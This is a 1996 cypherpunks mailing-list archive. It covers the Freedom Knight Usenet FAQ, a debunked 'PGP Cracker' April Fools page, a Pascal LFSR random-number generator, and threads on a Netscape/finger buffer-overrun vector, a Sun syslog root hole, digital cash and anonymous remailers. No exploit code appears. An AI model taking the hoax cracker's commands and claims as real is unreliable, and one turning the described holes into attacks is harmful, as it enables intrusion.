This is newsreader (usually found on sites run by a Freedom Knight) which
meets specific technical requirements, as specified below.

2.4) What does "content-based" mean?

"Content" is defined to be the Body of an electronic message, and/or
the Subject: line of an electronic message. You are considered to be
making content-based decisions if you have to read and parse Content
to make your determination.

Examples of content-based:
	-Inappropriate posting (you have to read the message)
	-Identical messages over several newsgroups (only if you read the messages)

Examples of NOT content-based:

	-Running the Body through a program to determine size
	-Making a cryptographic checksum from the Body

-----------------------------

Subject: 3. The Freedom Knight Code of Honor

(1) A Freedom Knight will never enforce the application of -any- content-based
    standards on any other net.citizen, unless that conduct directly and immediately
    renders their server's transport software incapable of performing its normal
    store and forward operation.

    In particular, with regard to USENET this means:

      a) A Freedom Knight -never- issues cancel messages, except for
      his or her own postings.

      b) A Freedom Knight never removes a newsgroup from their news
      server unless that newsgroup directly results in breaking one or
      more software systems used to distribute or read news. An
      example of this is long newsgroup names that break newsreaders.

      c) A Freedom Knight will refrain from feeding another site
      newsgroups that it does not want.

      d) A Freedom Knight will never disable any user they have authorized
      to read or post news from their site for content-based reasons.

      e) The only time a Freedom Knight may punish or suspend a user's
      access is if that user directly attempted to shut down the
      news server's normal "store and forward" operation. Mailbombs
      from the net as a result of postings do not count as direct
      attempts.

      f) A Freedom Knight will never take action against a user due to
      complaints regarding the content of the body of any of their user's
      posts.

(2) A Freedom Knight will always operate in such a way as to provide
    maximal unmoderated content on their news server. Any news site
    that a Freedom Knight operates is run as a Site Of Virtue, if the
    ownership of the site is willing.

    In particular, with regard to USENET this means:

      a) A Freedom Knight carries all unmoderated groups that they can get a
      feed for, regardless of content or origin, unless those groups
      serve no other purpose than to directly limit freedom of
      expression (e.g. alt.cancel, control, alt.nocem.*).

      b) A Freedom Knight actively solicites multiple feeds, technical
      considerations permitting.

      c) A Freedom Knight will feed any other site, technical considerations
      permitting.

      d) A Freedom Knight honors all newgroups and ignores all rmgroups,
      regardless of origin. The exception to this is if a newgroup message
      contains special characters that will damage the active file or most
      newsreader's .newsrcs.

      e) A Freedom Knight does not honor ANY cancel messages in any way
      shape or form. This includes Supercedes: or any other attempt to
      delete postings from the news server. The only way a Freedom Knight
      may honor cancel postings is if they are strongly authenticated
      to be from the originator of the postings.

3) A Freedom Knight, realizing the need for personal responsibility,
   will:

    a)  take each and every step necessary to ensure the security
        and reliability of their own site,

    b)  read news with a newsreader of virtue,

    c)  have "mail shields",

    d)  control their own posting habits by their own internal code
        of conduct, without calling undue attention to such control.

-----------------------------

Subject: 4. Technical Issues for a Site Of Virtue

In order to be a Site of Virtue, you need to be able to handle large
amounts of traffic, and be relatively immune to minor abuses of net
posters.

The technical criteria for a Site of Virtue are:

1) Maintain free newsspool space that is no less than 3 times
   the nominal 24 hour news traffic.

2) Internet connection must be of T1 speed (1.5 MB/sec) or greater.

3) The operating system must be a virtual-memory, multitasking system
   capable of handling large (>100) amounts of network connections at
   the same time.

4) The server must have a resident copy of the source code to the news
   server software you are using, and be able to build and modify the
   software.

Other notes:

If you are looking to set up a reasonably fast server, emphasis on a
wide I/O channel is a must.

On the newsserver side, I recommend INN, modified with Dave's Cancel
Patches so that cancels can be safely ignored. NNTPLINK feeds
are preferred as they are faster.

In order to be accessible to the rest of the Usenet community,
you should make sure that as news administrator you are accessible
to e-mail, as usenet@your.host.name and postmaster@your.host.name.
For that reason, Your "mail shields" should be installed on both
these addresses.

As site administrator you should probably read news.admin.*.
Reading these groups will keep you informed about the myriad of
standards people categorize as "net-abuses", and help you understand
what is wrong with the several emerging consensus opinions about
net-abuse for yourself.

-----------------------------

Subject: Policy Issues for a Site Of Virtue

The policy issues for a Site Of Virtue are:

1) Honor all newgroups that do not break newsreading software, regardless
of origin.

2) No unauthenticated cancel messages are honored, and optionally not
propagated. Only cancel messages authenticated to be from the author
of a message are honored.

3) All newsgroups, save those which would be inappropriate due to regional
or national boundaries, are carried.

Sites Of Virtue should feed each other, as appropriate.

-----------------------------

Subject: 6. Technical Issues for a Newsreader Of Virtue

In order to be a Newsreader of Virtue, a newsreader needs to be able to
find interesting threads in a large amount of traffic/noise.

The technical criteria for a newsreader of virtue are:

1) The newsreader must allow the user to specify patterns matching
subjects or authors which the reader will then refrain from displaying
to the user.

2) The newsreader must present articles by subject/author on a menu
to be selected by the user's for reading.

3) Articles presented on a menu must either be consolodated by Subject
line, or threaded by References line.

On the reader side, we currently recommend NN or (S)TRN. Gnus 5 has
also been recommended by some, this author hasn't looked at it yet.


-----------------------------

Subject: 7. Other Frequently Asked Questions

- I need a written policy for a site of virtue. What policy should I use?

For external browsers of your policy, add this:

"If you find a posting from this site offensive, inappropriate,
or disruptive please ignore it. If you don't know how to ignore
a posting, complain to us and we will demonstrate."

For internal users of your site, add this:

"USENET is interacted with at the reader's own risk. The postings
found here are usually locatable at sites all over the world. We
take no responsibility for the validity or appropriateness of articles
posted or read on this newsserver. Postings are the sole responsibility
of the poster."

- How long should the articles' expiration times be?

On most sites, disk space will limit the expiration times, and you
will have to spend some time fine-tuning them on a per hierarchy or
group basis.  It's often best if the "large file" groups -- those
carrying binaries for example -- expire more quickly than others.

Lastly, its best if a low-volume group has its expiration time set
long enough that the Frequently Asked Questions list (FAQ) and any
other periodic postings in the group are always there.  Well-managed
FAQs are supposed to come with their own expiration times, and you
should configure your site to honor these.

- What are "mail shields"?

There are two types of mail shields:

1) Absorptive - These take bogus mail and delete it.
2) Reflective - These take bogus mail and send it back somewhere
along with an optional message.

There are also two types of triggers on mail shields:

1) Threshold - These keep track of author and subject and when
more than N messages are recieved with the same author or subject,
the shields go up. Usually N is up at 1000 or so.

2) Disk Space - These keep track of available disk space, and
when that gets too low it triggers the shield. These triggers
are most used with "reflective" shields, as there are other
reasons than flamage to lose one's mail capability.

In general, Reflective Disk Space shields are the best choice as they
are the most multi-purpose.

It is often good to have something similar to "procmail", by which
you can filter out annoyances from your mailbox. Also. the MH mail
system coupled with SED, AWK, or PERL provides excellent filtering
capabilities. Again, Gnus 5 has been recommended.


-----------------------------

Subject: Revision History

$Log: virtue-faq.1,v $
Revision 1.5  1996/03/10 09:26:24  dave
Changed Russ Allbery's email address by request.

Revision 1.4  1996/03/04 00:04:25  dave
Added 2.1.1 about how to become a Knight

Revision 1.3  1996/02/28 20:52:33  dave
Added Russ Allbery's very nice expression of self responsibility.

Revision 1.2  1996/02/19 08:05:52  dave
Tightened up some of the definitions and codes, added Gnus 5
as a possible newsreader, and clarified a paragraph pertaining
to moral superiority. <grin>

Revision 1.1.1.2  1996/02/19 07:52:13  dave
Initial Import

--
         >>> Dave Hayes - Altadena CA, USA - dave@jetcafe.org <<<

People sell talking parrots for huge sums.  They never pause to compare the
possible value of a thinking parrot.                        -Mulla Nasrudin

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Byrd <byrd@acm.org>
Date: Sat, 30 Mar 1996 19:59:21 +0800
To: cypherpunks@toad.com
Subject: PGP Crack???
Message-ID: <2.2.16.19960330050617.3fdf7540@tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


This just appeared in alt.security.pgp.  Is there anything to it?  I'm dubious.
---------------
Path:
news.tiac.net!news-in.tiac.net!news.kei.com!newsfeed.internetmci.com!in2.uu.
net!EU.net!sun4nl!xs4all!mail
From: kwyatt@fix.net (Keith)
Newsgroups: alt.security.pgp,talk.politics.crypto
Subject: New release: PGP Cracker
Date: 30 Mar 1996 02:23:58 +0100
Organization: http://www.fix.net/~kwyatt/pgpcrack.html
Lines: 10
Sender: daemon@utopia.hacktic.nl
Message-ID: <199603300137.RAA12090@fletch.fix.net>
NNTP-Posting-Host: utopia.hacktic.nl
Mime-Version: 1.0
Content-Type: Text/Plain; charset=US-ASCII
X-To: mail2news@utopia.hacktic.nl
X-Newsreader: WinVN 0.99.7
X-Mail2News-Complaints-To: postmaster@utopia.hacktic.nl
Xref: news.tiac.net alt.security.pgp:52460 talk.politics.crypto:15088


Announcement:
No longer is PGP uncrackable. A new software program has been released
that cracks PGP encrypted messages. Find out more at:
http://www.fix.net/~kwyatt/pgpcrack.html
http://www.tcf.com:80/~kwyatt/pgpcrack.html

Our apologies to Phil Zimmerman!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vipul Ved Prakash" <vipul@pobox.com>
Date: Sun, 31 Mar 1996 09:20:19 +0800
To: cypherpunks@toad.com
Subject: Psuedo-Ramdom Number Generator
Message-ID: <199603301741.MAA15782@pobox.com>
MIME-Version: 1.0
Content-Type: text/plain



Don't know if its proper to post some trivial code snippets on the 
list. I felt some one just might find is useful.

Vipul

{*********************************************************************

                 LFSR-based Psuedo Random Number Generator

 LFSR is a random number generator based on a Linear Feedback Shift 
 Register The _tap_ sequence is 31, 6, 4, 2, 1 and 0. The primitive
 polynomial  mod  2 formed  from the tap sequence is x^32 + x^7 + x^5
 + x^3 + x^2 + x +  1.  The function  LFSRRandom  generates  a 16-bit
 unsigned  word.  Function  SetInit defines the initial parameters to
 run the generator with. It should be noted that  a particular set of
 Initial parameters will always generate  the  same set of 
 psuedo-random numbers.

 Vipul Ved Prakash <vipul@pobox.com>
 25th Feb '95 
**********************************************************************}

uses crt;

var lShiftReg : longint;
    wLastRandom : word;


procedure LFSRRandom(var wGeneratedRandom : word);
var
   i : integer;
   wNewRandom : word;
   lFnResult : longint;
begin
     wNewRandom := 0;
     for i := random(3) to random(3) + 13 do
     begin
          lFnResult := ((lShiftReg shr 31) xor (lShiftReg shr 06) xor
          (lShiftReg shr 04) xor (lShiftReg shr 02) xor (lShiftReg shr 01) xor
                        (lShiftReg)) and $1;
          lShiftReg := (lFnResult shl 31) or (lShiftReg shr 1);
          wNewRandom := wNewRandom or (lFnResult shl i)
     end;
     wGeneratedRandom := wLastRandom xor wNewRandom;
     wLastRandom := wNewRandom
end;

procedure paramError;
begin
     writeln;
     writeln;
     writeln(#07,'Syntax : RGen <random number file> <number of
     randoms to be generated> '); writeln; halt;
end;

procedure setInit(x, y : longint; z : integer);
begin
     if x <> 0 then lShiftReg :=  x else lShiftReg := 1; { Anything
     but 0 } wLastRandom := y; randseed := z;
end;


var
   i : longint;
   ch : char;
   wGeneratedRandom : word;
   ranfile : text;
   S : string;
   number : longint;
   code : integer;
   dummy : integer;
   count : integer;
begin
     count := 0;
     clrscr;
     setInit(4,5,10);
     if (paramcount < 2) then paramerror else assign(ranfile,
     paramstr(1)); rewrite(ranfile); val(paramstr(2), number, code);
     if code <> 0 then paramerror; for i := 1 to number do begin
          count := count + 1;
          LFSRRandom(wGeneratedRandom);
          str(wGeneratedRandom, S);
          writeln(ranfile, S);
          if count > 100 then
          begin
               count := 0;
               write('.'); {Write a dot after every 100 numbers}
          end;
     end;
     close(ranfile);
     writeln;
     writeln('Done. Press a key to exit...');
     ch := readkey;
     writeln;
end.
        .od8888bo.                              \|/
     .d%::::88::888b.             	       (@ @)
   .d888::::::::8:888%.   ------------------oOO-(_)-OOo-----------------
   88888:::::::88888::%.  You walk across with your flowers in your hand
  d888888:::88;888888::b       Trying to tell me no one understands
  888888888:888888888888   Trade in your hours for a hand full of dimes
  Y8888888::::::888888%P         Gonna make it baby in our prime.
  '8888888:::::::8888:%'  ----------------------------------------------
   '88888888:::888888%'   Vipul Ved Prakash        Fax : +91-11-3328849
     '8888888::88888%'    Positive Ideas.     Internet : vipul@pobox.com
        '"Y88%B8P"'       ----------------------------------------------    
                              PGP Key : Finger <vipul@pobox.com>	                  
 PGP Key fingerprint =  35 FF A2 CA BD 6B 80 82  61 30 F2 23 96 93 77 E4 
~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Gibbons <steve@aztech.net>
Date: Sun, 31 Mar 1996 00:04:08 +0800
To: tomw@netscape.com
Subject: Re: Netscape 2.01 fixes server vulnerabilities by breaking the        client...
Message-ID: <009A015C.30D31580.701@aztech.net>
MIME-Version: 1.0
Content-Type: text/plain


(This was previously posted to cypherpunks list, I have expanded the 
distribution to the firewalls list due to the content.)

In Article: <315C8FCB.2781@netscape.com>, Tom Weinstein <tomw@netscape.com> wrote:
# Rich Graves wrote:
# > 
# > Now I suppose they'll want me to fix all the pages where I do a finger
# > with a gopher://host:79/0user Any chance this nonfix can be unfixed?
# > 
# > This nonfix was applied to the UNIX and Win32 versions; I haven't
# > checked the other platforms.

# It may be unpleasant, but it's a fact that there was a real security
# hole here.  There is a well known buffer overrun bug in finger that a
# lot of people inside firewalls haven't fixed.  Using gopher: URLs
# in IMG tags it was possible to do nasty things.  We tried to err on
# the side of permissivity, but finger was one port we just couldn't
# allow.  Yes, it sucks.  So does someone reaching through your firewall
# and running commands as root.

Let's look at this from the perspective of a company with a firewall:
    Q: Do I want my users dictating what's allowed?
    A: Probably not.

    Q: Do I want my software vendors dictating what's allowed?
    A: Maybe not.

    Real Q1: When are sun/netscape/browser-vendor-x going to provide
    standardized, secure, multi-teired configuration options?

    Real Q2: It seams to me that most of the standard TCP protocols that a
    gopher client can talk to should have similarly standard protocol-specifiers
    for the URL.  Browser vendors are in a perfect position to say "this lack
    of synchronization is a real problem" and "It's bitten us already" and to 
    take care of the problem by proposing RFCs.  

    Real Q3: (Somewhat off-topic) when are signed applets going to appear?

    comprehensive standards coupled with multi-teired configuration options 
    would allow real-world customers and their net-neighbors to sleep a little 
    better at night.

--
Steve@AZTech.Net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@MICROSOFT.com>
Date: Sat, 30 Mar 1996 01:03:14 +0800
To: "'perry@piermont.com>
Subject: RE: What backs up digital money?
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960328183153Z-32962@red-07-imc.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: 	Perry E. Metzger
>
>Alan Horowitz writes:
>> I will put forth the proposition that Federal Reserve "Notes" are not 
>> notes.
>
>Probably true, but not relevant here on cypherpunks.
......................................................................

Perry, here's a question for you, and I am seriously interested in your
answer:

I agree that discussing the past history of money in relation to whether
the Federal Reserve should exist, or has the authority to issue "Notes",
and whether the Notes are actually worth anything, is too involved and
political and complex a discussion to pursue on this list.

But since electronic cash does involve encryption, and since this does
have social/political repercussions for the future of mankind, and since
the list does involve itself with an acute awareness of what this means
for life, liberty, and the pursuit of international wealth,

and since you know a lot about the place of free banking and currency in
the world economy (not to mention the Peruvian economy  <g>), 

and since it is a valuable exercise therefore to examine the logical,
valid perspective that one should have on this matter in order that one
be correct, rather than mistaken, on just how a fluid medium like
electronic currency could exist within this new cyber-world order while
not yet losing the attributes which have made it acceptable in the past,

what, then, would you yourself consider proper for discussion here?  A
brief outline would be sufficient, to create a context to keep in mind,
within which to contain & limit discussion, as we ponder the subject. 
Perhaps something which could be re-sent when newbies bring up the
question again.

Thanks.
   ..
>Blanc
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.cybrspc.mn.org (Roy M. Silvernail)
Date: Sat, 30 Mar 1996 19:17:40 +0800
To: byrd@ACM.ORG (Jim Byrd)
Subject: Re: PGP Crack???
In-Reply-To: <2.2.16.19960330050617.3fdf7540@tiac.net>
Message-ID: <960330.011033.9k0.rnr.w165w@sendai.cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, byrd@ACM.ORG writes:

>
> This just appeared in alt.security.pgp.  Is there anything to it?  I'm 
> dubious.

[snippo...]

> Announcement:
> No longer is PGP uncrackable. A new software program has been released
> that cracks PGP encrypted messages. Find out more at:
> http://www.fix.net/~kwyatt/pgpcrack.html

So you didn't have time to go check out the URL?

- ----- begin 'lynx -dump' output -----
Welcome to the PGP Cracker home page. As system
administrator you know the frustration in reading your
users Email if they use PGP. Or if your lover is
receiving encrypted messages you would be interested in
reading that encrypted email. Of course, government agencies
will be greatly interested in this new tool also.  The
program is free for non-commercial users! For government and
commercial applications the cost is $500.00 per site.
The program only runs on UNIX machines.

How does it work?
To decrypt any message that uses PGP you need the Public
Key and the random number generated to encrypt the message.

Commands:
Crack  -d filename.ext    Decrypts any encrypted message less than 2047 bytes.
Crack  -p secring.pgp     Lets you modify a keys password so the owner can
                          no longer decrypt messages.
Crack  -s PUBKEY.EXT      Lets you modify the public key ID information.
Crack  -h                 The crack help file

PGP Cracker is Copyright 1996 by Keith Wyatt, All Rights reserved.

   Download PGP Crack
- ----- end 'lynx -dump' output -----

The "Download PGP Crack" is a link.  Follow it and you get the following
text:

- ----- begin 'lynx -dump' output -----

                                 APRIL FOOLS!
                                       
- ----- end 'lynx -dump' output -----

Of course, if you have "the random number generated to encrypt the
message", you have the session key.  No further magic is necessary, and
no public key required.

But I bet a lot of newless cluebies bite.
- -- 
Roy M. Silvernail --  roy@cybrspc.mn.org will do just fine, thanks.
          "Does that not fit in with your plans?"
                      -- Mr Wiggen, of Ironside and Malone (Monty Python)
          PGP public key available upon request (send yours)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMVzfnBvikii9febJAQFeGwQAr3/U2WUSZ05z5oiE07f4NrUHEDxNFdSb
nVHDn9dnY7+e2mKy1rJJPZb8b+gaQEzig3WPbM4SO+loIJkoRmXq1xqKz46sBNON
nunJAQfgUuGBq36i3YBjy2bH+LSrgu5jvDd/Nqc+9Rfqu9kFV4kxxnpCuSi2nwUf
bbB6vJr9WRg=
=6ejG
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Garrett <teddygee@visi.net>
Date: Sat, 30 Mar 1996 17:45:56 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Anonymous Cpunk Bashing
Message-ID: <2.2.32.19960330062934.006c422c@mail.visi.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 01:06 PM 3/29/96 -0800, you wrote:
>The implication is that the people who oppose this "list of shame" are doing 
>so primarily for PERSONALITY reasons, rather than on the issues.  I would 
>feel better about the whole thing if the people who volunteered for the list 
>had engaged in some sort of serious effort to show that the placement of the 
>other people on that list was unjustified.  Lacking even the most 
>rudimentary effort along these lines, I really wonder who (and what) these 
>people think they're supporting.

I think that sometimes, one's cumulative reputation must count for something.
Most of the people who are included in this 'list of shame' have contributed
enormously to the furtherance of the crypto field in general.  Whether I conscribe
to their viewpoints or not on a given subject, it is rather easy for me to think
of something they have written which I use as a rather concrete reference.  Thusly,
given a track record of open and noteworthy thought on the field, I find it difficult
to denounce, as an example, Bruce Schneier.  Especially IF it's only a matter of
sharing a difference of opinion on a given bill or set of bills before our lawmakers.

Considering the fact that I've not seen Mr. Schneier come out on either side of the
Leahy Bill or, for that matter, many of the other bills currently before the congress,
it's hard for me to support mail-bombing him or many of the others on the list.
I think that the anonymous poster is behaving in a manner which I find
reprehensible in calling for such measures.  Therefore I simply ignore most of
the postings which match the pattern of the List Of Shame.  Have I researched
what statements or postings could have brought about the addition in the 
beginning?

Nope.

And since Mr/Ms Anonymous has chosen not to cite any particular references,
I'm not inclined to follow his/her lead.

To follow the example of several hundred thousand lemmings is not often
gauged as a wise thing.  Provide me a REASON to believe there has been
a treachery perpetrated, and perhaps that cliff won't look quite so high.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMVzUm81+l8EKBK5FAQGR9wf+PU0tN4tvfWcEXTfSBYISSKeVcxzv+rPH
WgmQy2LL8UBnR1lgPgZByf9obHsXA4ocXlbzYe/8Pke7TO61WFarXDR7t6GiCFDI
GM4fH8PV/iYVXTUl3oX5aUdh0mQ29t0+0wI2Jp7D1hL2fCeWR8YF7LTTluSL7mc3
SQtirVB7PC+QyquYhx8hyqIlvnIRolqc+NwqhapF9f4u8UzK3oTvWKf/6cHNijRx
Nn3rU/T9WGV0N7lN9s4+yyvsR1wo+cZET3cs6SSbaEhm9PIM7NMHMP1kvxewC64Z
msy48RMvCmtvT3A9ovXbFT5lunQiGBoySXj9l9rUDC75j0oX3gJWnA==
=it9D
-----END PGP SIGNATURE-----
---------------------------------------------------------------------------------------------------------
Ted Garrett <teddygee@visi.net>  http://www.visi.net/~teddygee
"Those who desire to give up Freedom in order to gain
  Security will not have, nor do they deserve, either one."
					Thomas Jefferson




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 30 Mar 1996 02:18:01 +0800
To: jsw@netscape.com
Subject: Re: Edited Edupage, 24 March 1996
In-Reply-To: <315A3ECA.6E53@netscape.com>
Message-ID: <199603281535.KAA02728@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Weinstein writes:
> > 1) I strongly suggest that SSL is *not* in its current form the right
> >    technology, because internet phone type tools probably use UDP, not
> >    TCP.
> 
>   I guess that is what I get for posting when too tired.  Certainly the
> current SSL won't work for UDP based protocols.  Either we will have to
> make a UDP version of SSL or use some existing protocol that gets the job
> done.  Since our acquisition is not complete I haven't really had an
> opportunity to talk to the streaming media guys yet...

You probably want to look into the hooks that RTP audio programs like
VAT use right now to do their cryptography (yes, they do crypto) -- I
belive there is lots of precedent.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@UNiX.asb.com (Mutatis Mutantdis)
Date: Sat, 30 Mar 1996 15:58:24 +0800
To: cypherpunks@toad.com
Subject: Noise sphere plotter in C
Message-ID: <199603300240.VAA07216@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Noise sphere plotter written in Borland C (w/executable),
added options for rotation or plotting 16-bit samples etc.
[Interesting patterns show up w/16-bit plotting, esp. with timer drift
sampling from Win 3.11]

Reply with subject "send nsphere-c".







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Bugden <jbugden@alis.com>
Date: Sat, 30 Mar 1996 02:57:14 +0800
To: "'tcmay@got.net.at.Internet (Timothy C. May)>
Subject: RE: Why Americans feel no compulsion to learn foreign langua
Message-ID: <01BB1C93.A8A24E40@jbugden.alis.com>
MIME-Version: 1.0
Content-Type: text/plain


At Thursday, March 28, 1996 12:32 AM, Timothy C. May wrote:
>My point is not against the learning of a foreign language, just that
>economic considerations _must_ play a role.

Q: What do you call an American company that ported its internet software 
to 22 different langauges in order to compete in the world?

A: Microsoft

>My European friends usually study the language of their direct neighbors
>and important trading/scientific partners. English, German, French,
>typically.

So the question is: Who do you want as a neighbour and/or trading partner?

>(One person communicated with me in private about this, saying that the
>international nature of the Internet is an ironic counterpoint to my point.
>So I promised this guy I would learn Hindi and Polish to better be able to
>use the Internet. 

Actually, you promised me that you'd sign up to learn "Swedish. No, wait, 
to learn Polish. Or is it Japanese, or Greek, or Hindi, or...."

But why bother going to all that trouble. Everything you need to be able to 
encounter another language is right in front of you.

http://www.branchezvous.com could be one place to start.

But perhaps my point is misdirected. Even those who speak English and
share a similar culture can find it hard to communicate sometimes.

Ciao,
James
jbugden@alis.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 30 Mar 1996 23:03:11 +0800
To: cypherpunks@toad.com
Subject: Re: Why Americans feel no compulsion to learn foreign languages
Message-ID: <ad8241c03f021004d4c1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:50 PM 3/29/96, Dr. Dimitri Vulis wrote:

>Likewise, Tim says there's no value in learning about "traditional" crypto.
>I say there is.

This is taken completely out of context and is beneath contempt in terms of
trying to argue a point.

*PLONK*


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Sat, 30 Mar 1996 03:10:27 +0800
To: cypherpunks@toad.com
Subject: Re: Sun patch pulled (was Re: HP & Export of DCE)
In-Reply-To: <199603272316.XAA13429@pangaea.hypereality.co.uk>
Message-ID: <doug-9602281439.AA01371320@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


>
>I noticed that Sun's latest libc patch (101759-04) is empty.  Previous
>versions contained the complete U.S. version of libc, including the
>tres-dangerous DES and crypt functions.  In the current rev only the
>README remains, presumably because:
>        EXPORT INFORMATION: This patch includes code which performs
>        cryptographic functions, which are subject to U.S. export
>        control, and must not be exported outside the U.S. without
>        prior approval of the U.S. government.  Prior export approval
>        must be obtained by the user of this patch.
>
>So, you might ask, what fixes is Sun not distributing???
>    (Rev 04)
>        1190985 gethostbyname() can trash an existing open file descriptor.
>        1182835 portmapper silently fails with version mismatch by PC-NFS
>                client
>        1219835 Syslog(3) can be abused to gain root access on 4.X systems.
>
Yes, all very dangerous, but, come on, how hard is it to call sun
to get a copy of the patch? (answer, it's not). This is not that big
of a deal.

>Yup, that's right.  The syslog hole that was so well publicized by
>CERT will remain open indefinitely because the ITAR makes it illegal
>for Sun to distribute the fix!
>
It's easy to patch yourself too. I had a patch for this three days after
it was announced, distributed via anon FTP and bugtraq. Basically, replacing
syslog.c with one that Perry had written and adding an snprintf.c function.
I've discontinued offering this since Sun's patch is now available.

>So did HP and Sun spontaneously, simultaneously develop crypto awareness,
>or is some gummint dweeb whispering threats in their ear?
>

Who cares as long as they distribute the patch? The international libc
patch is still freely available to anyone who wants it.


--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		Pro is to Con as progress is to congress




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vincent S. Gunville" <vingun@rgalex.com>
Date: Sat, 30 Mar 1996 03:20:32 +0800
To: cohen@chuma.cas.usf.edu
Subject: Re: Councilman/Usenet porn case...
In-Reply-To: <Pine.SUN.3.91.960327121637.17983A-100000@rwd.goucher.edu>
Message-ID: <315AB3E4.41B6@rgalex.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is an example of what anonymous remailers can 
do.......
> 
> 
> 
>    TIME Magazine
> 
>    April 1, 1996 Volume 147, No. 14
>      _________________________________________________________________
> 
>    Return to Contents page
>      _________________________________________________________________
> 
> 
> WAY WRONG NUMBER
> 
>   HELL HATH NO FURY LIKE A CITY COUNCILMAN PORNED
> 
> 
> 
>    JOSHUA QUITTNER
> 
>    This is a tale about how an online prank grows into an international
>    incident. It also goes a long way toward explaining the fear many
>    non-Internet people have about this out-of-control thing called
>    cyberspace.
> 
>    Our story begins on the banks of Lake Erie, in Willowick, Ohio (pop.
>    15,469). It is the last Monday night in January, about 9 o'clock. City
>    councilman Frank Suponcic is home with his wife Linda when the phone
>    rings. Linda answers. "Hi, this is Mike," says the man at the other
>    end, politely enough. Linda chats with Mike, figuring he must be a
>    constituent. (As Willowick's longest-serving ward councilman, Suponcic
>    has lots of voters calling him at home.) After a while, Mike asks for
>    Annette. Linda tells him he has the wrong number. Mike apologizes and
>    hangs up.
> 
>    The phone rings again at 11:30 p.m. And again. And again. Wrong
>    numbers until 4:30 a.m. A weary Suponcic wonders what's up and checks
>    the Caller-ID logs on his phone. The first call was from British
>    Columbia. The next was from Connecticut. There was one from
>    Indianapolis and a few from California. Clearly these are not
>    constituents. But who are they?
> 
>    Suponcic calls the Canadian back--it is now 5:30 a.m. in that time
>    zone, and he is only too happy to wake the dude up--and he demands to
>    know what is going on. The guy explains, vaguely, that he was merely
>    answering an "ad on the Internet. You know, the one about horny
>    housewives..."
> 
>    So now we have a problem. Suponcic, like a lot of people, has a new
>    computer. But like most people, he hardly knows what the Internet is.
>    Now, somewhere there's an ad on it. For horny housewives. With his
>    home phone number.
> 
>    That night, when the next wrong number came in, Suponcic interrogated
>    the caller and learned that the councilman's phone number was printed
>    at the bottom of some pictures of naked women that had been posted to
>    a Usenet newsgroup called alt.binaries.pictures.erotica, which,
>    naturally, Suponcic had never heard of. But he had a friend in
>    Cleveland who was something of a computer buff. So the next day the
>    two of them jacked into Usenet and spent three hours sifting through
>    about 7,400 files on alt. binaries.etc.
> 
>    Eventually, they found two with Suponcic's phone number. One featured
>    a topless brunet wearing only a string of pearls and offering phone
>    calls for "as low as 87 [cents] per minute." The other showed a blond
>    woman advertising "hot amateur wives ready for you from there [sic]
>    own bed." Yikes.
> 
>    Over the next week, Suponcic received more than 75 calls a day from
>    lusty Netizens. "You just could not make phone calls," says the
>    exasperated councilman. "And when you went to bed, you had to take
>    your phone off the hook."
> 
>    It was the sorcerer's apprentice scenario, and there was no way to
>    stop it.
> 
>    Suponcic, being a public official, knew his way around the local
>    police department, and soon a detective started pounding the Net. By
>    tracing the header information on the Usenet postings, the detective
>    determined--O.K., this part is murky, we admit--that the messages had
>    originated in Ohio, passed through Florida Online, an Internet
>    provider in the Sunshine State, and then through anon.penet.fi, a free
>    E-mail remailer service based in Finland that allows Internet users to
>    post messages anonymously.
> 
>    The identity of the poster was, and is, unknown, though Suponcic has
>    his suspicions. "It's my personal belief that the root of this is
>    political," says the councilman, who had to get an unlisted telephone
>    number and whose wife now wants to move.
> 
>    On Feb. 6, at Suponcic's urging, the Willowick city council passed a
>    resolution asking the state and federal governments to close the
>    "loopholes" that allowed anonymous remailers to operate outside the
>    authority of U.S. law-enforcement officials. "Once you've achieved one
